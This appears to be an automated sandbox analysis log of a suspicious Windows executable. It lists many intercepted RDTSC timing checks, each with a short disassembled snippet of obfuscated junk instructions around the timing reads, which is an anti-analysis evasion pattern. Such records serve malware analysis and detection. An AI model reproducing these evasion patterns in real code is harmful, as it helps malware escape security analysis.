Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50A0ED4 second address: 50A0EDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50A0EDA second address: 50A0EE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50A0EE0 second address: 50A0EE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50F012C second address: 50F0149 instructions: 0x00000000 rdtsc 0x00000002 mov bh, cl 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov ebp, esp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007F5BC10B709Eh 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5080165 second address: 50801D1 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F5BC10A3609h 0x00000008 jmp 00007F5BC10A35FBh 0x0000000d popfd 0x0000000e pop edx 0x0000000f pop eax 0x00000010 popad 0x00000011 push dword ptr [ebp+0Ch] 0x00000014 pushad 0x00000015 mov ebx, esi 0x00000017 pushfd 0x00000018 jmp 00007F5BC10A3600h 0x0000001d and cl, 00000068h 0x00000020 jmp 00007F5BC10A35FBh 0x00000025 popfd 0x00000026 popad 0x00000027 push dword ptr [ebp+08h] 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F5BC10A3605h 0x00000031 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50801D1 second address: 50801D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50A0B60 second address: 50A0B78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5BC10A3604h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50A0B78 second address: 50A0C17 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10B709Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F5BC10B70A6h 0x00000011 push eax 0x00000012 jmp 00007F5BC10B709Bh 0x00000017 xchg eax, ebp 0x00000018 pushad 0x00000019 call 00007F5BC10B70A4h 0x0000001e pushad 0x0000001f popad 0x00000020 pop esi 0x00000021 pushfd 0x00000022 jmp 00007F5BC10B70A1h 0x00000027 and ch, 00000066h 0x0000002a jmp 00007F5BC10B70A1h 0x0000002f popfd 0x00000030 popad 0x00000031 mov ebp, esp 0x00000033 jmp 00007F5BC10B709Eh 0x00000038 pop ebp 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007F5BC10B70A7h 0x00000040 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50A0C17 second address: 50A0C1C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50A0707 second address: 50A0732 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, bx 0x00000006 call 00007F5BC10B70A3h 0x0000000b pop eax 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F5BC10B709Bh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50A0732 second address: 50A078B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F5BC10A35FFh 0x00000009 sbb ecx, 100B95AEh 0x0000000f jmp 00007F5BC10A3609h 0x00000014 popfd 0x00000015 mov eax, 28164237h 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d mov dword ptr [esp], ebp 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F5BC10A3609h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50A078B second address: 50A07BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10B70A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F5BC10B709Eh 0x00000010 pop ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F5BC10B709Ah 0x0000001a rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50A07BF second address: 50A07CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10A35FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50A07CE second address: 50A07D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50A07D4 second address: 50A07D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50A07D8 second address: 50A07DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50A063C second address: 50A064C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5BC10A35FCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50A064C second address: 50A0650 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50A0650 second address: 50A0668 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F5BC10A35FDh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50A0668 second address: 50A0678 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5BC10B709Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50A0461 second address: 50A047B instructions: 0x00000000 rdtsc 0x00000002 movzx eax, bx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F5BC10A35FEh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50A047B second address: 50A048D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5BC10B709Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50B01BD second address: 50B01C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50B01C1 second address: 50B01DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10B70A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50B01DE second address: 50B01FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10A3601h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov dx, cx 0x0000000e push eax 0x0000000f push edx 0x00000010 movzx eax, dx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50B01FD second address: 50B023C instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F5BC10B709Bh 0x00000008 xor ax, 708Eh 0x0000000d jmp 00007F5BC10B70A9h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F5BC10B709Ch 0x0000001e rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50C03D9 second address: 50C03DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50C03DD second address: 50C03E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50C03E3 second address: 50C0466 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007F5BC10A35FAh 0x0000000b and esi, 747649C8h 0x00000011 jmp 00007F5BC10A35FBh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ebp 0x0000001b pushad 0x0000001c call 00007F5BC10A3604h 0x00000021 mov cx, CD41h 0x00000025 pop ecx 0x00000026 popad 0x00000027 mov ebp, esp 0x00000029 pushad 0x0000002a call 00007F5BC10A35FFh 0x0000002f movzx esi, bx 0x00000032 pop edx 0x00000033 call 00007F5BC10A3602h 0x00000038 movzx esi, di 0x0000003b pop ebx 0x0000003c popad 0x0000003d mov eax, dword ptr [ebp+08h] 0x00000040 jmp 00007F5BC10A35FAh 0x00000045 and dword ptr [eax], 00000000h 0x00000048 pushad 0x00000049 push eax 0x0000004a push edx 0x0000004b pushad 0x0000004c popad 0x0000004d rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50A059F second address: 50A05A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50B0EF7 second address: 50B0EFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50B0EFB second address: 50B0F01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50B0F01 second address: 50B0F20 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10A35FCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov ebx, ecx 0x0000000d mov edi, esi 0x0000000f popad 0x00000010 mov ebp, esp 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50B0F20 second address: 50B0F26 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50C01C7 second address: 50C021F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10A35FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F5BC10A3606h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov edi, esi 0x00000015 pushfd 0x00000016 jmp 00007F5BC10A3608h 0x0000001b add esi, 267BCD48h 0x00000021 jmp 00007F5BC10A35FBh 0x00000026 popfd 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50C021F second address: 50C024C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10B70A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F5BC10B709Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50E0700 second address: 50E0706 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50E0706 second address: 50E0739 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10B709Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a pushad 0x0000000b call 00007F5BC10B70A4h 0x00000010 mov bh, ch 0x00000012 pop ebx 0x00000013 mov di, ax 0x00000016 popad 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50E0739 second address: 50E073F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50E073F second address: 50E0754 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 930Eh 0x00000007 mov bx, D21Ah 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ecx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 mov ax, dx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50E0754 second address: 50E078B instructions: 0x00000000 rdtsc 0x00000002 mov bx, 836Ch 0x00000006 pop edx 0x00000007 pop eax 0x00000008 call 00007F5BC10A3605h 0x0000000d mov dl, ah 0x0000000f pop edi 0x00000010 popad 0x00000011 mov eax, dword ptr [76FB65FCh] 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F5BC10A35FFh 0x0000001d rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50E078B second address: 50E07A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5BC10B70A4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50E07A3 second address: 50E07A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50E07A7 second address: 50E0829 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test eax, eax 0x0000000a pushad 0x0000000b mov edi, 037BC930h 0x00000010 pushfd 0x00000011 jmp 00007F5BC10B70A9h 0x00000016 or eax, 6DBBB8B6h 0x0000001c jmp 00007F5BC10B70A1h 0x00000021 popfd 0x00000022 popad 0x00000023 je 00007F5C32F0A212h 0x00000029 pushad 0x0000002a push esi 0x0000002b jmp 00007F5BC10B70A3h 0x00000030 pop eax 0x00000031 mov ax, dx 0x00000034 popad 0x00000035 mov ecx, eax 0x00000037 pushad 0x00000038 mov si, di 0x0000003b movsx edx, cx 0x0000003e popad 0x0000003f xor eax, dword ptr [ebp+08h] 0x00000042 push eax 0x00000043 push edx 0x00000044 jmp 00007F5BC10B70A0h 0x00000049 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50E0829 second address: 50E0852 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10A35FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and ecx, 1Fh 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F5BC10A3605h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50E0852 second address: 50E08AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F5BC10B70A7h 0x00000009 or si, BE0Eh 0x0000000e jmp 00007F5BC10B70A9h 0x00000013 popfd 0x00000014 push eax 0x00000015 pop edx 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 ror eax, cl 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F5BC10B70A9h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50E08AE second address: 50E0924 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, edx 0x00000005 mov cx, bx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b leave 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F5BC10A35FBh 0x00000013 sbb eax, 0165617Eh 0x00000019 jmp 00007F5BC10A3609h 0x0000001e popfd 0x0000001f mov ch, 4Fh 0x00000021 popad 0x00000022 retn 0004h 0x00000025 nop 0x00000026 mov esi, eax 0x00000028 lea eax, dword ptr [ebp-08h] 0x0000002b xor esi, dword ptr [00322014h] 0x00000031 push eax 0x00000032 push eax 0x00000033 push eax 0x00000034 lea eax, dword ptr [ebp-10h] 0x00000037 push eax 0x00000038 call 00007F5BC5EA3E23h 0x0000003d push FFFFFFFEh 0x0000003f pushad 0x00000040 jmp 00007F5BC10A3609h 0x00000045 mov cx, 3DA7h 0x00000049 popad 0x0000004a pop eax 0x0000004b jmp 00007F5BC10A35FAh 0x00000050 ret 0x00000051 nop 0x00000052 push eax 0x00000053 call 00007F5BC5EA3E49h 0x00000058 mov edi, edi 0x0000005a push eax 0x0000005b push edx 0x0000005c pushad 0x0000005d mov dx, 18F0h 0x00000061 popad 0x00000062 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50E0924 second address: 50E0938 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5BC10B70A0h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5090011 second address: 5090021 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5BC10A35FCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5090021 second address: 5090025 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5090025 second address: 509005D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 jmp 00007F5BC10A35FCh 0x0000000e mov dword ptr [esp], ebp 0x00000011 jmp 00007F5BC10A3600h 0x00000016 mov ebp, esp 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F5BC10A35FAh 0x00000021 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 509005D second address: 509006C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10B709Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 509006C second address: 5090072 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5090072 second address: 50900B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10B709Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b and esp, FFFFFFF8h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F5BC10B709Bh 0x00000017 and si, E78Eh 0x0000001c jmp 00007F5BC10B70A9h 0x00000021 popfd 0x00000022 mov di, si 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50900B8 second address: 50900BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50900BE second address: 50900EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10B709Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ecx 0x0000000c pushad 0x0000000d mov edi, esi 0x0000000f popad 0x00000010 push eax 0x00000011 jmp 00007F5BC10B709Ch 0x00000016 xchg eax, ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50900EC second address: 5090109 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10A3609h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5090109 second address: 5090119 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5BC10B709Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5090119 second address: 50901AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10A35FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c pushad 0x0000000d mov dx, ax 0x00000010 jmp 00007F5BC10A3600h 0x00000015 popad 0x00000016 push eax 0x00000017 jmp 00007F5BC10A35FBh 0x0000001c xchg eax, ebx 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007F5BC10A3604h 0x00000024 jmp 00007F5BC10A3605h 0x00000029 popfd 0x0000002a pushfd 0x0000002b jmp 00007F5BC10A3600h 0x00000030 jmp 00007F5BC10A3605h 0x00000035 popfd 0x00000036 popad 0x00000037 mov ebx, dword ptr [ebp+10h] 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f popad 0x00000040 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50901AA second address: 50901BD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10B709Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50901BD second address: 50901D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5BC10A3604h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50901D5 second address: 5090269 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10B709Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c jmp 00007F5BC10B70A6h 0x00000011 push eax 0x00000012 jmp 00007F5BC10B709Bh 0x00000017 xchg eax, esi 0x00000018 pushad 0x00000019 mov ax, E28Bh 0x0000001d pushfd 0x0000001e jmp 00007F5BC10B70A0h 0x00000023 adc ax, 1298h 0x00000028 jmp 00007F5BC10B709Bh 0x0000002d popfd 0x0000002e popad 0x0000002f mov esi, dword ptr [ebp+08h] 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 pushfd 0x00000036 jmp 00007F5BC10B709Bh 0x0000003b add si, AB5Eh 0x00000040 jmp 00007F5BC10B70A9h 0x00000045 popfd 0x00000046 mov esi, 1F720827h 0x0000004b popad 0x0000004c rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5090269 second address: 509026F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 509026F second address: 5090273 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5090273 second address: 50902FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10A35FFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, edi 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F5BC10A3604h 0x00000013 or ax, 21B8h 0x00000018 jmp 00007F5BC10A35FBh 0x0000001d popfd 0x0000001e popad 0x0000001f push eax 0x00000020 jmp 00007F5BC10A3604h 0x00000025 xchg eax, edi 0x00000026 pushad 0x00000027 mov eax, 1B9BC8ADh 0x0000002c mov dl, al 0x0000002e popad 0x0000002f test esi, esi 0x00000031 push eax 0x00000032 push edx 0x00000033 pushad 0x00000034 pushfd 0x00000035 jmp 00007F5BC10A35FEh 0x0000003a jmp 00007F5BC10A3605h 0x0000003f popfd 0x00000040 movzx eax, di 0x00000043 popad 0x00000044 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50902FE second address: 5090304 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5090304 second address: 5090308 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5090308 second address: 5090332 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F5C32F5539Bh 0x0000000e jmp 00007F5BC10B70A0h 0x00000013 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5090332 second address: 5090339 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov bh, 9Bh 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5090339 second address: 50903B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F5BC10B709Bh 0x00000009 add ax, 284Eh 0x0000000e jmp 00007F5BC10B70A9h 0x00000013 popfd 0x00000014 mov bx, cx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a je 00007F5C32F55354h 0x00000020 pushad 0x00000021 mov esi, 5910FF4Fh 0x00000026 pushfd 0x00000027 jmp 00007F5BC10B70A4h 0x0000002c jmp 00007F5BC10B70A5h 0x00000031 popfd 0x00000032 popad 0x00000033 mov edx, dword ptr [esi+44h] 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007F5BC10B709Dh 0x0000003d rdtsc
